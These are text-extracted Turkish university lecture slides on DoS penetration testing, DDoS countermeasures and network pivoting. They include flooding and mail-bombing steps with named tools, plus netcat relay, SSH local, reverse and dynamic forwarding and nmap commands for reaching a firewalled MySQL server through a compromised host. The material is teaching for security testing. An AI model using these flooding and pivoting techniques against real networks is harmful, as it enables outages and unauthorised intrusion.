1 Pentest’in amacı ve planını tanımlayın2 Sunucu veya uygulama üzerinde yapay istekler oluşturarak yük testi
(load test) gerçekleştirinI Webserver Stress Tool, Web Stress Tester, JMeter
3 Ağı tarayarak DoS açıklarını kontrol edin. Nmap, GFI LANGuard veyaNessus gibi araçları kullanabilirsiniz.
4 Hedefi bağlantı istek paketleriyle boğarak sunucuda SYN saldırısı yapın.Araçlar: DoS HTTP, Sprut
5 Sunucu üzerine çok sayıda TCP veya UDP paket göndererek ”portflooding” saldırısı yapın. Araçlar: Pepsi5, Mutilate
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
DDoS Pentest II
6 E-posta sunucusunda, e-posta bombardımanı çalıştırın. Araçlar: MailBomber, Advanced Mail Bomber
7 Web sitesi formlarını ve ziyaretçi defterini keyfi ve uzun girdilerikullanarak sahte girişlerle doldurun.
8 Son olarak, tüm bulguları belgeleyin ve belirlenen sorunların çözümündebir sonraki adımları başlatın.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Gelişmiş DDoS Koruma Yöntemi
Gelişmiş DDoS Koruma Yöntemi
1 Ağ ortamını değerlendirin ve bir savunma planı gerçekleştirin2 Kapsamlı ve katmanlı bir DDoS stratejisi geliştirin3 Altyapı (infrastructure) düzeyinde kontrol uygulayın4 DNS sunucularını ve diğer kritik altyapıyı koruyun5 Kurum içi özel DDoS araçları uygulayın
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
İçindekiler
1 DDoS Saldırıları (Devam)SYN Flood - MetasploitDNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirişActive ProfilingSequential Change-PointDalgacık Analizi
3 Karşı ÖnlemlerKarşı ÖnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıEgress FilteringIngress FilteringTCP InterceptHoneypots
Load-Balancing4 BotNet Karşı Önlemler
RFC 3704 FiltrelemeGelişmiş Koruma AraçlarıKarşı Önlemler
5 DDoS PentestDDoS PentestGelişmiş DDoS Koruma Yöntemi
6 PivotingRoutingPivotingKullanılan Pivoting KanallarıAraçlar
7 KanallarNetcat relaySSH Lokal Port YönlendirmeSSH Ters Port YönlendirmeSSH Dinamik Port YönlendirmeMeterpreter Sessions
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Routing I
RoutingI Defense-in-Depth: Hizmetleri koruyabilmek için çok katmanlı güvenlik
mimarileri geliştirilmektedir.I Kritik sistemler (veritabanı, uygulama sunucusu gibi) yer aldığı ağ, diğer
sistemlerin bulunduğu ağ üzerinde olmamalıdır.I Routing: Farklı ağ üzerinde bulunan cihazların nasıl haberleşeceği
belirleyen süreç
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Routing II
Şekil: Routing
Bir ağ paketinin ilerlemesi aşağıdaki gibidir:I IP adresi yerel ağda üzerinde mi?
I Eğer öyleyse,hedefe ulaşır
I Değilse, ağ
geçidinegönder
I Yönlendirici (router) paketi aldığında,kendi yönlendirme tablosuna (routingtable) bakar
I Hedef IP adresi veya hedef ağ içinbir yönlendirme kuralı var mı?
I Evet ise, paketi hedefeyönlendir
I Değilse, ağ geçidine gönderI Aynı işlem diğer yönlendiricilerde de
tekrarlanır.I Paket nihayet kurumun internet çıkışından
sorumlu yönlendiriciye ulaşır. Ve paketinternete gönderilir.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Routing III
Pivoting:I Temel olarak, ele geçirilmiş bilgisayarları kullanarak normal şartlar
altında erişemediğimiz ağlara erişme süreciI Birden fazla ağa erişimi olan bir bilgisayarın ele geçirilmesi durumunda
ağ izolasyonu işe yaramaz.I Bu yöntemle, ele geçirilen bilgisayarlar ile yönlendirme yapan bir
saldırgan gizli ağlara erişebilir. Yeni keşfedilen ağa yapılacak her istekPivot üzerinden iletilir.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Routing IV
Şekil: Routing 10
10https://pentest.blog/explore-hidden-networks-with-double-pivoting/Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Pivoting I
Örnek SenaryoI Sladırgan IP adresi: 192.168.1.104I Compromised Windows XP: 192.168.1.131 ve 10.128.0.3.I Saldırgan 10.128.0.x ağını tarar ve IP 10.128.0.1 (Linux) keşfeder.I IP 10.128.0.1 (Linux) doğrudan saldırgan tarafından erişilebilir değildir,
ancak yine de ”Pivot” tekniğiyle saldırılabilinir.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Kullanılan Pivoting Kanalları
Kullanılan KanallarI Netcat relaysI SSH local port forwardingI SSH dynamic port forwarding (SOCKS proxy)I Meterpreter sessionsI Ncat HTTP proxy
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Kullanılan Araçlar
Araçlar
I NmapI ProxychainsI Netcat
I NcatI Web BrowserI Metasploit
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
İçindekiler
1 DDoS Saldırıları (Devam)SYN Flood - MetasploitDNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
2 DDoS Saldırı AlgılamaGirişActive ProfilingSequential Change-PointDalgacık Analizi
3 Karşı ÖnlemlerKarşı ÖnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıEgress FilteringIngress FilteringTCP InterceptHoneypots
Load-Balancing4 BotNet Karşı Önlemler
RFC 3704 FiltrelemeGelişmiş Koruma AraçlarıKarşı Önlemler
5 DDoS PentestDDoS PentestGelişmiş DDoS Koruma Yöntemi
6 PivotingRoutingPivotingKullanılan Pivoting KanallarıAraçlar
7 KanallarNetcat relaySSH Lokal Port YönlendirmeSSH Ters Port YönlendirmeSSH Dinamik Port YönlendirmeMeterpreter Sessions
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Netcat relay I
Listing 4: Netcat relay$mknod backpipe p$nc -l -p 12700 0backpipe
Netcat RelaysI 12700. port üzerinde bir Netcat listener oluşturur.
I -l listen for an incoming connection rather than initiate a connection to aremote host
I Listener gelen bütün trafiği tubitak.gov.tr adresi ve 80 porta yönlendirilir.I mknod: ”character/block device” oluşturma için kullanılır.
I -p: for fifo (pipe).
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Netcat relay II
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Netcat relay III
Şekil: Tarayıcı Görünümü
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Netcat relay IV
Şekil: Banner Grabbing
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Netcat relay V
Şekil: Netcat relay, banner grabbing Wireshark çıktısı
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Netcat relay VI
Eksik taraflarI Netcat relay yöntemi, HTTP trafiği için çok uygun değil.
I HTTP isteği tamamlandığı zaman, Netcat relay çalışmasını durdurur.
I Bir döngü kullanılarak Netcat’in yeniden başlatılması şeklinde bir çözümyapılabilir.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Local Port Forwarding I
Local Port Forwarding
I Belli bir sunucuyla bağlantıya izin vermeyen özel bir ağ üzerindeolduğumuzu kabul edeilim.
I google.com engelleniyor olsun.I Ağımızda olmayan ve dolayısıyla google.com’a erişebilen bir sunucu
üzerinden bir tünel oluşturabilir.
Listing 5: SSH lokal port yönlendirme
$ssh -L 12700:google.com:80 [email protected]
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Local Port Forwarding II
$ssh -L port:destination_host:destination_portusername@pivot_host
Komut satırıI port : dinlemede olan lokal portI destination host : hedef IP adresi veya hostnameI destination port : hedef sunucuda dinlemede olan portI username: pivot sunucuda yer alan kullanıcı adıI pivot host : pivot sunucunun IP adresi veya hostname
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Local Port Forwarding III
Şekil: SSH lokal port yönlendirme
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Local Port Forwarding IV
Şekil: SSH lokal port yönlendirme
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Local Port Forwarding V
Şekil: SSH lokal port yönlendirme
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Local Port Forwarding VI
Şekil: SSH lokal port yönlendirme
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Firewall Arkasında Yer Alan Veritabanına Bağlanmak I
Database Behind FirewallI localhost (127.0.0.1) üzerinden erişilebilen fakat uzaktan erişilemeyen
portlara erişim.
Şekil: MySQL tunel bağlantısı
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Firewall Arkasında Yer Alan Veritabanına Bağlanmak II
Şekil: MySQL tunel bağlantısı
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Firewall Arkasında Yer Alan Veritabanına Bağlanmak III
Şekil: MySQL lokal port fwd Pcap görüntüsü
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Firewall Arkasında Yer Alan Veritabanına Bağlanmak IV
Şekil: MySQL-Workbench kullanıcı bağlantıları
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Firewall Arkasında Yer Alan Veritabanına Bağlanmak V
Şekil: NMap port versiyon taraması
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Firewall Arkasında Yer Alan Veritabanına Bağlanmak VI
Şekil: Nmap MySQL Enum betiği
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Firewall Arkasında Yer Alan Veritabanına Bağlanmak VII
Şekil: Nmap MySQL Brute betiği
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Ters Port Yönlendirme I
Şekil: Kurban tarafı ters ssh yönlendirme
Şekil: Saldırgan tarafı ters ssh yönlendirme
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Ters Port Yönlendirme II
Local vs RemoteI ssh -L port:host:hostport : lokal makinede port ’u dinler, uzak makinenin
satırında ”host:hostport” trafiğini gönderir.I ssh -R port:host:hostport : uzak makinede port ’u dinler, lokal makinenin
satırında ”host:hostport” trafiğini gönderir.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Dinamik Port Yönlendirme (Socks Proxy) I
SSH Dinamik Port YönlendirmeI SSH istemcisi ve SSH sunucusu arasında güvenli kanal oluşturur.
Listing 6: Dinamik Port komut satırı (saldırgan tarafı)
$ssh -D address:port username@pivot_host
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Dinamik Port Yönlendirme (Socks Proxy) II
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Dinamik Port Yönlendirme (Socks Proxy) III
Şekil: Saldırgan tarafı dinamik port yönlendirme
Şekil: İstemci tarafı dinamik port yönlendirme
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Dinamik Port Yönlendirme (Socks Proxy) IV
Şekil: İstemci tarafı proxy tanımlama
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Dinamik Port Yönlendirme (Socks Proxy) V
Şekil: İstemci tarafı web tarayıcı
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
SSH Dinamik Port Yönlendirme (Socks Proxy) VI
Şekil: Sunucu tarafı paket trafiği
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Meterpreter Sessions I
Meterpreter SessionsI Metasploit, tünelleme için farklı bileşenlere sahiptir.I Metasploit route komutu diğer ağlara sıçrama yapılabilir.I Bu şekilde metasploit üzerinde yer alan exploitler diğer ağ’lar üzerinde
kullanılabilir hale gelir.
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Meterpreter Sessions II
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Meterpreter Sessions III
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Meterpreter Sessions IV
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Meterpreter Sessions V
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Meterpreter Sessions VI
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Meterpreter Sessions VII
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam) DDoS Saldırı Algılama Karşı Önlemler BotNet Karşı Önlemler DDoS Pentest Pivoting Kanallar
Lab
LabI Netcat relay
mknod backpipe pnc -l -p12700 0backpipe
I Local Port Forwarding (Attacker)I (Web)
ssh -L 12700:tubitak.gov.tr:80 [email protected] (MySQL)
ssh -L 12700:localhost:3306 [email protected] (NMap)
nmap -sS -sV -p12700 10.0.2.4
I Reverse ShellI (Victim) ssh -R 12700:localhost:3306 [email protected] MySQL Client Connection 12700
Dr. Ferhat Özgür Çatak [email protected] 12 - Servis Dışı Bırakma Testleri - Pivoting
DDoS Saldırıları (Devam)SYN Flood - MetasploitDNS AmplificationDNS Amplification - ScapyHTTP GET FloodSlowloris Saldırısı
DDoS Saldırı AlgılamaGirisActive ProfilingSequential Change-PointDalgacık Analizi
Karsı ÖnlemlerKarsı ÖnlemlerSaldırıyı Absorbe EtmekServis Hizmetinin AzaltılmasıHizmetin KapatılmasıEgress FilteringIngress FilteringTCP InterceptHoneypotsLoad-Balancing
BotNet Karsı ÖnlemlerRFC 3704 FiltrelemeGelismis Koruma AraçlarıKarsı Önlemler
DDoS PentestDDoS PentestGelismis DDoS Koruma Yöntemi
PivotingRoutingPivotingKullanılan Pivoting KanallarıAraçlar
KanallarNetcat relaySSH Lokal Port YönlendirmeSSH Ters Port YönlendirmeSSH Dinamik Port YönlendirmeMeterpreter Sessions